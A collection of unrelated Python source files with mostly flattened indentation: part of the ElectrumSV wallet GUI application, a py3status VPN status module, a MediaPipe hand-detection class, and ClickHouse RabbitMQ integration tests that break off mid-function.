wallet.contacts._on_identity_added = self._on_identity_added # type: ignore[assignment]
wallet.contacts._on_identity_removed = self._on_identity_removed # type: ignore[assignment]
def _on_identity_added(self, contact: ContactEntry, identity: ContactIdentity) -> None:
self.identity_added_signal.emit(contact, identity)
def _on_identity_removed(self, contact: ContactEntry, identity: ContactIdentity) -> None:
self.identity_removed_signal.emit(contact, identity)
def _on_contact_added(self, contact: ContactEntry, identity: ContactIdentity) -> None:
self.contact_added_signal.emit(contact, identity)
def _on_contact_removed(self, contact: ContactEntry) -> None:
self.contact_removed_signal.emit(contact)
def get_wallets(self) -> Iterable[Wallet]:
return [ window._wallet for window in self.windows ]
def get_wallet_window(self, path: str) -> Optional[ElectrumWindow]:
for w in self.windows:
if w._wallet.get_storage_path() == path:
return w
return None
def get_wallet_window_by_id(self, account_id: int) -> Optional[ElectrumWindow]:
for w in self.windows:
for account in w._wallet.get_accounts():
if account.get_id() == account_id:
return w
return None
def start_new_window(self, wallet_path: Optional[str], uri: Optional[str]=None,
is_startup: bool=False) -> Optional[ElectrumWindow]:
'''Raises the window for the wallet if it is open. Otherwise
opens the wallet and creates a new window for it.'''
for w in self.windows:
if w._wallet.get_storage_path() == wallet_path:
w.bring_to_top()
break
else:
wizard_window: Optional[WalletWizard] = None
if wallet_path is not None:
open_result = WalletWizard.attempt_open(wallet_path)
if open_result.was_aborted:
return None
if not open_result.is_valid:
wallet_filename = os.path.basename(wallet_path)
MessageBox.show_error(
_("Unable to load file '{}'.").format(wallet_filename))
return None
wizard_window = open_result.wizard
else:
wizard_window = WalletWizard(is_startup=is_startup)
if wizard_window is not None:
result = wizard_window.run()
# This will return Accepted in some failure cases, like migration failure, due
# to wallet wizard standard buttons not being easily dynamically changeable.
if result != QDialog.Accepted:
return None
wallet_path = wizard_window.get_wallet_path()
if wallet_path is None:
return None
# All paths leading to this obtain a password and put it in the credential cache.
assert wallet_path is not None
wallet = app_state.daemon.load_wallet(wallet_path)
assert wallet is not None
w = self._create_window_for_wallet(wallet)
if uri:
w.pay_to_URI(uri)
w.bring_to_top()
w.setWindowState(QtCore.Qt.WindowState(
(int(w.windowState()) & ~QtCore.Qt.WindowState.WindowMinimized) |
QtCore.Qt.WindowState.WindowActive))
# this will activate the window
w.activateWindow()
return w
def update_check(self) -> None:
if (not app_state.config.get('check_updates', True) or
app_state.config.get("offline", False)):
return
def f() -> None:
import requests
try:
response = requests.request(
'GET', "https://electrumsv.io/release.json",
headers={'User-Agent' : 'ElectrumSV'}, timeout=10)
result = response.json()
self._on_update_check(True, result)
except Exception:
self._on_update_check(False, cast(ExceptionInfoType, sys.exc_info()))
t = threading.Thread(target=f)
        t.daemon = True
t.start()
def _on_update_check(self, success: bool, result: UpdateCheckResultType) -> None:
if success:
when_checked = datetime.datetime.now().astimezone().isoformat()
app_state.config.set_key('last_update_check', result)
app_state.config.set_key('last_update_check_time', when_checked, True)
self.update_check_signal.emit(success, result)
def initial_dialogs(self) -> None:
'''Suppressible dialogs that are shown when first opening the app.'''
dialogs.show_named('welcome-ESV-1.4.0b1')
def event_loop_started(self) -> None:
self.cosigner_pool = CosignerPool()
self.label_sync = LabelSync()
if app_state.config.get("show_crash_reporter", default=True):
self.exception_hook = cast(ExceptionHandlerABC, Exception_Hook(self))
self.timer.start()
signal.signal(signal.SIGINT, lambda *args: self.quit())
self.initial_dialogs()
path = app_state.config.get_cmdline_wallet_filepath()
if not self.start_new_window(path, app_state.config.get('url'), is_startup=True):
self.quit()
def run_app(self) -> None:
when_started = datetime.datetime.now().astimezone().isoformat()
app_state.config.set_key('previous_start_time', app_state.config.get("start_time"))
app_state.config.set_key('start_time', when_started, True)
self.update_check()
        threading.current_thread().name = 'GUI'
self.timer.setSingleShot(False)
self.timer.setInterval(500) # msec
self.timer.timeout.connect(app_state.device_manager.timeout_clients)
QTimer.singleShot(0, self.event_loop_started)
self.exec_()
logs.remove_handler(self.log_handler)
# Shut down the timer cleanly
self.timer.stop()
# clipboard persistence
# see http://www.mail-archive.com/pyqt@riverbankcomputing.com/msg17328.html
event = QtCore.QEvent(QtCore.QEvent.Type.Clipboard)
self.sendEvent(self.clipboard(), event)
self.tray.hide()
def run_coro(self, coro: Callable[..., Coroutine[Any, Any, T1]], *args: Any,
on_done: Optional[Callable[[concurrent.futures.Future[T1]], None]]=None) \
-> concurrent.futures.Future[T1]:
        '''Run a coroutine. on_done, if given, is passed the future containing the result or
        exception, and is guaranteed to be called in the context of the GUI thread.
        '''
def task_done(future: concurrent.futures.Future[T1]) -> None:
self.async_tasks_done.emit()
future = app_state.async_.spawn(coro, *args, on_done=on_done)
future.add_done_callback(task_done)
return future
def run_in_thread(self, func: Callable[..., T1], *args: Any,
on_done: Optional[Callable[[concurrent.futures.Future[T1]], None]]=None) \
-> concurrent.futures.Future[T1]:
        '''Run func(*args) in a thread. on_done, if given, is passed the future containing the
        result or exception, and is guaranteed to be called in the context of the GUI
        thread.
        '''
return self.run_coro(run_in_thread, func, *args, on_done=on_done)
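    # A minimal usage sketch for the two helpers above, assuming `app` is the
    # application instance and `fetch_data`/`update_ui`/`logger` are hypothetical
    # helpers: the future is delivered to `on_done` on the GUI thread, so UI
    # updates are safe inside the callback.
    #
    #     def _fetch_done(future: concurrent.futures.Future) -> None:
    #         try:
    #             data = future.result()   # re-raises any exception from the worker
    #         except Exception:
    #             logger.exception("background fetch failed")
    #         else:
    #             update_ui(data)          # runs on the GUI thread
    #
    #     app.run_in_thread(fetch_data, "some-argument", on_done=_fetch_done)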
|
vpn_status.py
|
# -*- coding: utf-8 -*-
"""
Drop-in replacement for i3status run_watch VPN module.
Expands on the i3status module by displaying the name of the connected vpn
using pydbus. Asynchronously updates on dbus signals unless check_pid is True.
Configuration parameters:
cache_timeout: How often to refresh in seconds when check_pid is True.
(default 10)
check_pid: If True, act just like the default i3status module.
(default False)
format: Format of the output.
(default 'VPN: {name}|VPN: no')
pidfile: Same as i3status.conf pidfile, checked when check_pid is True.
(default '/sys/class/net/vpn0/dev_id')
Format placeholders:
{name} The name and/or status of the VPN.
Color options:
    color_bad: VPN down / not connected
    color_good: VPN connected
Requires:
pydbus: Which further requires PyGi. Check your distribution's repositories.
@author Nathan Smith <nathan AT praisetopia.org>
SAMPLE OUTPUT
{'color': '#00FF00', 'full_text': u'VPN: yes'}
off
{'color': '#FF0000', 'full_text': u'VPN: no'}
"""
from pydbus import SystemBus
from gi.repository import GObject
from threading import Thread
from os import path
from time import sleep
class Py3status:
"""
"""
# available configuration parameters
cache_timeout = 10
check_pid = False
format = "VPN: {name}|VPN: no"
pidfile = "/sys/class/net/vpn0/dev_id"
def post_config_hook(self):
self.thread_started = False
self.active = []
def _start_handler_thread(self):
"""Called once to start the event handler thread."""
# Create handler thread
t = Thread(target=self._start_loop)
t.daemon = True
# Start handler thread
t.start()
self.thread_started = True
def _start_loop(self):
"""Starts main event handler loop, run in handler thread t."""
# Create our main loop, get our bus, and add the signal handler
loop = GObject.MainLoop()
bus = SystemBus()
manager = bus.get(".NetworkManager")
manager.onPropertiesChanged = self._vpn_signal_handler
# Loop forever
loop.run()
def _vpn_signal_handler(self, args):
"""Called on NetworkManager PropertiesChanged signal"""
# Args is a dictionary of changed properties
# We only care about changes in ActiveConnections
active = "ActiveConnections"
# Compare current ActiveConnections to last seen ActiveConnections
if active in args.keys() and sorted(self.active) != sorted(args[active]):
self.active = args[active]
self.py3.update()
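    # The `args` mapping handled above contains only the properties that changed.
    # A representative payload (illustrative, not captured from a real bus) is a
    # list of D-Bus object paths, e.g.
    #
    #     {"ActiveConnections":
    #         ["/org/freedesktop/NetworkManager/ActiveConnection/1"]}
    #
    # which _get_vpn_status() below resolves to connection objects via
    # bus.get(".NetworkManager", name).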
def _get_vpn_status(self):
"""Returns None if no VPN active, Id if active."""
# Sleep for a bit to let any changes in state finish
sleep(0.3)
# Check if any active connections are a VPN
bus = SystemBus()
ids = []
for name in self.active:
conn = bus.get(".NetworkManager", name)
if conn.Vpn:
ids.append(conn.Id)
        # Return the Ids of any active VPNs (an empty list means no VPN is active)
return ids
def _check_pid(self):
"""Returns True if pidfile exists, False otherwise."""
return path.isfile(self.pidfile)
# Method run by py3status
def return_status(self):
"""Returns response dict"""
# Start signal handler thread if it should be running
if not self.check_pid and not self.thread_started:
self._start_handler_thread()
# Set color_bad as default output. Replaced if VPN active.
name = None
color = self.py3.COLOR_BAD
# If we are acting like the default i3status module
if self.check_pid:
if self._check_pid():
name = "yes"
color = self.py3.COLOR_GOOD
# Otherwise, find the VPN name, if it is active
else:
vpn = self._get_vpn_status()
if vpn:
name = ", ".join(vpn)
color = self.py3.COLOR_GOOD
# Format and create the response dict
full_text = self.py3.safe_format(self.format, {"name": name})
response = {
"full_text": full_text,
"color": color,
"cached_until": self.py3.CACHE_FOREVER,
}
# Cache forever unless in check_pid mode
if self.check_pid:
response["cached_until"] = self.py3.time_in(self.cache_timeout)
return response
if __name__ == "__main__":
"""
Run module in test mode.
"""
from py3status.module_test import module_test
module_test(Py3status)
|
detect_hands.py
|
import cv2
import numpy as np
import mediapipe as mp
import time
import threading
class HandDetector():
def __init__(self, static_mode = False, maxHands = 2, complexity=1, detectionCon = 0.5, trackCon = 0.5):
self.static_mode = static_mode
self.maxHands = maxHands
self.complexity = complexity
self.detectionCon = detectionCon
self.trackCon = trackCon
self.mpHands = mp.solutions.hands
self.hands = self.mpHands.Hands(static_image_mode=self.static_mode,
max_num_hands=self.maxHands,
model_complexity=self.complexity,
min_detection_confidence=self.detectionCon,
min_tracking_confidence=self.trackCon)
self.mpDraw = mp.solutions.drawing_utils
self.landmarks = None
self.stop_event = threading.Event()
self.image = None
self.hand_center = (None, None)
self.hand_image = None
def findHands(self, img, draw=True):
imgRGB = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
self.results = self.hands.process(imgRGB)
if self.results.multi_hand_landmarks:
for handLms in self.results.multi_hand_landmarks:
if draw:
self.mpDraw.draw_landmarks(img, handLms, self.mpHands.HAND_CONNECTIONS)
return img
def findPosition(self, img, handNo = 0, draw=True):
lmlist = []
if self.results.multi_hand_landmarks:
myHand = self.results.multi_hand_landmarks[handNo]
for id, lm in enumerate(myHand.landmark):
h, w, c = img.shape
cx, cy = int(lm.x * w), int(lm.y * h)
lmlist.append([id, cx, cy])
if draw:
cv2.circle(img, (cx, cy), 3, (255, 0, 255), cv2.FILLED)
self.landmarks = lmlist
return lmlist
def findCenter(self, img, lmlist, draw=True):
center_x, center_y = None, None
if len(lmlist) != 0:
center_x = 0
center_y = 0
for lm in lmlist:
center_x += lm[1]
center_y += lm[2]
center_x = int(center_x / len(lmlist))
center_y = int(center_y / len(lmlist))
if draw:
cv2.circle(img, (center_x, center_y), 10, (0, 255, 0), cv2.FILLED)
return (center_x, center_y)
    def detect(self):
        while not self.stop_event.is_set():
            # Skip until a frame has been supplied from outside the thread.
            if self.image is None:
                continue
            frame = self.image.copy()
            frame = self.findHands(frame)
            lmlist = self.findPosition(frame, draw=False)
            self.hand_center = self.findCenter(frame, lmlist)
            self.hand_image = frame
def start(self):
self.stop_event.clear()
self.thread = threading.Thread(target=self.detect, args=())
self.thread.start()
def stop(self):
self.stop_event.set()
def main():
pTime = 0
cTime = 0
cap = cv2.VideoCapture(0, cv2.CAP_V4L2)
cap.set(cv2.CAP_PROP_FOURCC, cv2.VideoWriter_fourcc(*'MJPG'))
cap.set(cv2.CAP_PROP_FRAME_WIDTH, 1280)
cap.set(cv2.CAP_PROP_FRAME_HEIGHT, 720)
detector = HandDetector(static_mode=False, complexity=1)
    while True:
        success, img = cap.read()
        if not success:
            continue
        img = np.array(img[:, ::-1])  # Mirror the frame horizontally
img = detector.findHands(img)
lmlist = detector.findPosition(img, draw=False)
center = detector.findCenter(img, lmlist)
image_center = np.array(img.shape[:2]) / 2
print(f"Hand Center: {center}, Image center: {image_center}")
cTime = time.time()
fps = 1 / (cTime - pTime)
pTime = cTime
cv2.putText(img, str(round(fps, 2)), (10, 70), cv2.FONT_HERSHEY_PLAIN, 3, (255, 0, 255), 3)
cv2.imshow("Image", img)
if cv2.waitKey(1) == ord('q'):
break
if __name__ == '__main__':
main()
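# HandDetector also supports a threaded mode (start()/stop() driving detect())
# that main() above does not exercise.  A minimal sketch of that usage, where a
# hypothetical capture loop keeps assigning fresh frames to detector.image:
#
#     detector = HandDetector()
#     detector.start()
#     while capturing:                      # hypothetical capture loop
#         detector.image = latest_frame     # worker thread picks this up
#         center = detector.hand_center     # most recent result from the thread
#     detector.stop()
#     detector.thread.join()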
|
test.py
|
import json
import os.path as p
import random
import subprocess
import threading
import logging
import time
from random import randrange
import pika
import pytest
from google.protobuf.internal.encoder import _VarintBytes
from helpers.client import QueryRuntimeException
from helpers.cluster import ClickHouseCluster
from helpers.test_tools import TSV
from . import rabbitmq_pb2
cluster = ClickHouseCluster(__file__)
instance = cluster.add_instance('instance',
main_configs=['configs/rabbitmq.xml', 'configs/log_conf.xml'],
with_rabbitmq=True)
# Helpers
def rabbitmq_check_result(result, check=False, ref_file='test_rabbitmq_json.reference'):
fpath = p.join(p.dirname(__file__), ref_file)
with open(fpath) as reference:
if check:
assert TSV(result) == TSV(reference)
else:
return TSV(result) == TSV(reference)
def kill_rabbitmq(rabbitmq_id):
p = subprocess.Popen(('docker', 'stop', rabbitmq_id), stdout=subprocess.PIPE)
p.communicate()
return p.returncode == 0
def revive_rabbitmq(rabbitmq_id):
p = subprocess.Popen(('docker', 'start', rabbitmq_id), stdout=subprocess.PIPE)
p.communicate()
return p.returncode == 0
# Fixtures
@pytest.fixture(scope="module")
def rabbitmq_cluster():
try:
cluster.start()
logging.debug("rabbitmq_id is {}".format(instance.cluster.rabbitmq_docker_id))
instance.query('CREATE DATABASE test')
yield cluster
finally:
cluster.shutdown()
@pytest.fixture(autouse=True)
def rabbitmq_setup_teardown():
print("RabbitMQ is available - running test")
yield # run test
instance.query('DROP TABLE IF EXISTS test.rabbitmq')
# Tests
def test_rabbitmq_select(rabbitmq_cluster):
instance.query('''
CREATE TABLE test.rabbitmq (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = '{}:5672',
rabbitmq_exchange_name = 'select',
rabbitmq_format = 'JSONEachRow',
rabbitmq_row_delimiter = '\\n';
'''.format(rabbitmq_cluster.rabbitmq_host))
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters(rabbitmq_cluster.rabbitmq_ip, rabbitmq_cluster.rabbitmq_port, '/', credentials)
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
for message in messages:
channel.basic_publish(exchange='select', routing_key='', body=message)
connection.close()
# The order of messages in select * from test.rabbitmq is not guaranteed, so sleep to collect everything in one select
time.sleep(1)
result = ''
while True:
result += instance.query('SELECT * FROM test.rabbitmq ORDER BY key', ignore_error=True)
if rabbitmq_check_result(result):
break
rabbitmq_check_result(result, True)
def test_rabbitmq_select_empty(rabbitmq_cluster):
instance.query('''
CREATE TABLE test.rabbitmq (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = '{}:5672',
rabbitmq_exchange_name = 'empty',
rabbitmq_format = 'TSV',
rabbitmq_row_delimiter = '\\n';
'''.format(rabbitmq_cluster.rabbitmq_host))
assert int(instance.query('SELECT count() FROM test.rabbitmq')) == 0
def test_rabbitmq_json_without_delimiter(rabbitmq_cluster):
instance.query('''
CREATE TABLE test.rabbitmq (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = '{}:5672',
rabbitmq_exchange_name = 'json',
rabbitmq_format = 'JSONEachRow'
'''.format(rabbitmq_cluster.rabbitmq_host))
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters(rabbitmq_cluster.rabbitmq_ip, rabbitmq_cluster.rabbitmq_port, '/', credentials)
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
messages = ''
for i in range(25):
messages += json.dumps({'key': i, 'value': i}) + '\n'
all_messages = [messages]
for message in all_messages:
channel.basic_publish(exchange='json', routing_key='', body=message)
messages = ''
for i in range(25, 50):
messages += json.dumps({'key': i, 'value': i}) + '\n'
all_messages = [messages]
for message in all_messages:
channel.basic_publish(exchange='json', routing_key='', body=message)
connection.close()
time.sleep(1)
result = ''
while True:
result += instance.query('SELECT * FROM test.rabbitmq ORDER BY key', ignore_error=True)
if rabbitmq_check_result(result):
break
rabbitmq_check_result(result, True)
def test_rabbitmq_csv_with_delimiter(rabbitmq_cluster):
instance.query('''
CREATE TABLE test.rabbitmq (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_exchange_name = 'csv',
rabbitmq_format = 'CSV',
rabbitmq_row_delimiter = '\\n';
''')
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters(rabbitmq_cluster.rabbitmq_ip, rabbitmq_cluster.rabbitmq_port, '/', credentials)
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
messages = []
for i in range(50):
messages.append('{i}, {i}'.format(i=i))
for message in messages:
channel.basic_publish(exchange='csv', routing_key='', body=message)
connection.close()
time.sleep(1)
result = ''
while True:
result += instance.query('SELECT * FROM test.rabbitmq ORDER BY key', ignore_error=True)
if rabbitmq_check_result(result):
break
rabbitmq_check_result(result, True)
def test_rabbitmq_tsv_with_delimiter(rabbitmq_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.rabbitmq (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_exchange_name = 'tsv',
rabbitmq_format = 'TSV',
rabbitmq_queue_base = 'tsv',
rabbitmq_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.rabbitmq;
''')
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters(rabbitmq_cluster.rabbitmq_ip, rabbitmq_cluster.rabbitmq_port, '/', credentials)
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
messages = []
for i in range(50):
messages.append('{i}\t{i}'.format(i=i))
for message in messages:
channel.basic_publish(exchange='tsv', routing_key='', body=message)
connection.close()
result = ''
while True:
result = instance.query('SELECT * FROM test.view ORDER BY key')
if rabbitmq_check_result(result):
break
rabbitmq_check_result(result, True)
def test_rabbitmq_materialized_view(rabbitmq_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.rabbitmq (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_exchange_name = 'mv',
rabbitmq_format = 'JSONEachRow',
rabbitmq_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.rabbitmq;
''')
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters(rabbitmq_cluster.rabbitmq_ip, rabbitmq_cluster.rabbitmq_port, '/', credentials)
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
for message in messages:
channel.basic_publish(exchange='mv', routing_key='', body=message)
while True:
result = instance.query('SELECT * FROM test.view ORDER BY key')
        if rabbitmq_check_result(result):
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
connection.close()
rabbitmq_check_result(result, True)
def test_rabbitmq_materialized_view_with_subquery(rabbitmq_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.rabbitmq (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_exchange_name = 'mvsq',
rabbitmq_format = 'JSONEachRow',
rabbitmq_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM (SELECT * FROM test.rabbitmq);
''')
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters(rabbitmq_cluster.rabbitmq_ip, rabbitmq_cluster.rabbitmq_port, '/', credentials)
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
for message in messages:
channel.basic_publish(exchange='mvsq', routing_key='', body=message)
while True:
result = instance.query('SELECT * FROM test.view ORDER BY key')
if rabbitmq_check_result(result):
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
connection.close()
rabbitmq_check_result(result, True)
def test_rabbitmq_many_materialized_views(rabbitmq_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view1;
DROP TABLE IF EXISTS test.view2;
DROP TABLE IF EXISTS test.consumer1;
DROP TABLE IF EXISTS test.consumer2;
CREATE TABLE test.rabbitmq (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_exchange_name = 'mmv',
rabbitmq_format = 'JSONEachRow',
rabbitmq_row_delimiter = '\\n';
CREATE TABLE test.view1 (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE TABLE test.view2 (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer1 TO test.view1 AS
SELECT * FROM test.rabbitmq;
CREATE MATERIALIZED VIEW test.consumer2 TO test.view2 AS
SELECT * FROM test.rabbitmq;
''')
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters(rabbitmq_cluster.rabbitmq_ip, rabbitmq_cluster.rabbitmq_port, '/', credentials)
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
for message in messages:
channel.basic_publish(exchange='mmv', routing_key='', body=message)
while True:
result1 = instance.query('SELECT * FROM test.view1 ORDER BY key')
result2 = instance.query('SELECT * FROM test.view2 ORDER BY key')
if rabbitmq_check_result(result1) and rabbitmq_check_result(result2):
break
instance.query('''
DROP TABLE test.consumer1;
DROP TABLE test.consumer2;
DROP TABLE test.view1;
DROP TABLE test.view2;
''')
connection.close()
rabbitmq_check_result(result1, True)
rabbitmq_check_result(result2, True)
@pytest.mark.skip(reason="clichouse_path with rabbitmq.proto fails to be exported")
def test_rabbitmq_protobuf(rabbitmq_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.rabbitmq (key UInt64, value String)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_exchange_name = 'pb',
rabbitmq_format = 'Protobuf',
rabbitmq_schema = 'rabbitmq.proto:KeyValueProto';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.rabbitmq;
''')
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters(rabbitmq_cluster.rabbitmq_ip, rabbitmq_cluster.rabbitmq_port, '/', credentials)
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
data = ''
for i in range(0, 20):
msg = rabbitmq_pb2.KeyValueProto()
msg.key = i
msg.value = str(i)
serialized_msg = msg.SerializeToString()
data = data + _VarintBytes(len(serialized_msg)) + serialized_msg
channel.basic_publish(exchange='pb', routing_key='', body=data)
data = ''
for i in range(20, 21):
msg = rabbitmq_pb2.KeyValueProto()
msg.key = i
msg.value = str(i)
serialized_msg = msg.SerializeToString()
data = data + _VarintBytes(len(serialized_msg)) + serialized_msg
channel.basic_publish(exchange='pb', routing_key='', body=data)
data = ''
for i in range(21, 50):
msg = rabbitmq_pb2.KeyValueProto()
msg.key = i
msg.value = str(i)
serialized_msg = msg.SerializeToString()
data = data + _VarintBytes(len(serialized_msg)) + serialized_msg
channel.basic_publish(exchange='pb', routing_key='', body=data)
connection.close()
result = ''
while True:
result = instance.query('SELECT * FROM test.view ORDER BY key')
if rabbitmq_check_result(result):
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
rabbitmq_check_result(result, True)
def test_rabbitmq_big_message(rabbitmq_cluster):
    # Create batches of messages of size ~100Kb
rabbitmq_messages = 1000
batch_messages = 1000
messages = [json.dumps({'key': i, 'value': 'x' * 100}) * batch_messages for i in range(rabbitmq_messages)]
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters(rabbitmq_cluster.rabbitmq_ip, rabbitmq_cluster.rabbitmq_port, '/', credentials)
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.rabbitmq (key UInt64, value String)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_exchange_name = 'big',
rabbitmq_format = 'JSONEachRow';
CREATE TABLE test.view (key UInt64, value String)
ENGINE = MergeTree
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.rabbitmq;
''')
for message in messages:
channel.basic_publish(exchange='big', routing_key='', body=message)
while True:
result = instance.query('SELECT count() FROM test.view')
if int(result) == batch_messages * rabbitmq_messages:
break
connection.close()
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
assert int(result) == rabbitmq_messages * batch_messages, 'ClickHouse lost some messages: {}'.format(result)
def test_rabbitmq_sharding_between_queues_publish(rabbitmq_cluster):
NUM_CONSUMERS = 10
NUM_QUEUES = 10
instance.query('''
CREATE TABLE test.rabbitmq (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_exchange_name = 'test_sharding',
rabbitmq_num_queues = 10,
rabbitmq_num_consumers = 10,
rabbitmq_format = 'JSONEachRow',
rabbitmq_row_delimiter = '\\n';
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.view (key UInt64, value UInt64, channel_id String)
ENGINE = MergeTree
ORDER BY key
SETTINGS old_parts_lifetime=5, cleanup_delay_period=2, cleanup_delay_period_random_add=3;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT *, _channel_id AS channel_id FROM test.rabbitmq;
''')
i = [0]
messages_num = 10000
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters(rabbitmq_cluster.rabbitmq_ip, rabbitmq_cluster.rabbitmq_port, '/', credentials)
def produce():
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
messages = []
for _ in range(messages_num):
messages.append(json.dumps({'key': i[0], 'value': i[0]}))
i[0] += 1
current = 0
for message in messages:
current += 1
mes_id = str(current)
channel.basic_publish(exchange='test_sharding', routing_key='',
properties=pika.BasicProperties(message_id=mes_id), body=message)
connection.close()
threads = []
threads_num = 20
for _ in range(threads_num):
threads.append(threading.Thread(target=produce))
for thread in threads:
time.sleep(random.uniform(0, 1))
thread.start()
result1 = ''
while True:
result1 = instance.query('SELECT count() FROM test.view')
time.sleep(1)
if int(result1) == messages_num * threads_num:
break
result2 = instance.query("SELECT count(DISTINCT channel_id) FROM test.view")
for thread in threads:
thread.join()
    assert int(result1) == messages_num * threads_num, 'ClickHouse lost some messages: {}'.format(result1)
assert int(result2) == 10
def test_rabbitmq_mv_combo(rabbitmq_cluster):
NUM_MV = 5
NUM_CONSUMERS = 4
instance.query('''
CREATE TABLE test.rabbitmq (key UInt64, value UInt64)
ENGINE = RabbitMQ
SETTINGS rabbitmq_host_port = 'rabbitmq1:5672',
rabbitmq_exchange_name = 'combo',
rabbitmq_queue_base = 'combo',
rabbitmq_num_consumers = 2,
rabbitmq_num_queues = 5,
rabbitmq_format = 'JSONEachRow',
rabbitmq_row_delimiter = '\\n';
''')
for mv_id in range(NUM_MV):
instance.query('''
DROP TABLE IF EXISTS test.combo_{0};
DROP TABLE IF EXISTS test.combo_{0}_mv;
CREATE TABLE test.combo_{0} (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.combo_{0}_mv TO test.combo_{0} AS
SELECT * FROM test.rabbitmq;
'''.format(mv_id))
time.sleep(2)
i = [0]
messages_num = 10000
credentials = pika.PlainCredentials('root', 'clickhouse')
parameters = pika.ConnectionParameters(rabbitmq_cluster.rabbitmq_ip, rabbitmq_cluster.rabbitmq_port, '/', credentials)
def produce():
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
messages = []
for _ in range(messages_num):
messages.append(json.dumps({'key': i[0], 'value': i[0]}))
i[0] += 1
for msg_id in range(messages_num):
channel.basic_publish(exchange='combo', routing_key='',
properties=pika.BasicProperties(message_id=str(msg_id)), body=messages[msg_id])
connection.close()
threads = []
threads_num = 20
for _ in range(threads_num):
threads.append(threading.Thread(target=produce))
for thread in threads:
time.sleep(random.uniform(0, 1))
thread.start()
while True:
result = 0
for mv_id in range(NUM_MV):
result += int(instance.query('SELECT count() FROM test.combo_{0}'.format(mv_id)))
if int(result) == messages_num * threads_num * NUM_MV:
break
time.sleep(1)
for thread in threads:
thread.join()
for mv_id in range(NUM_MV):
instance.query('''
DROP TABLE test.combo_{0}_mv;
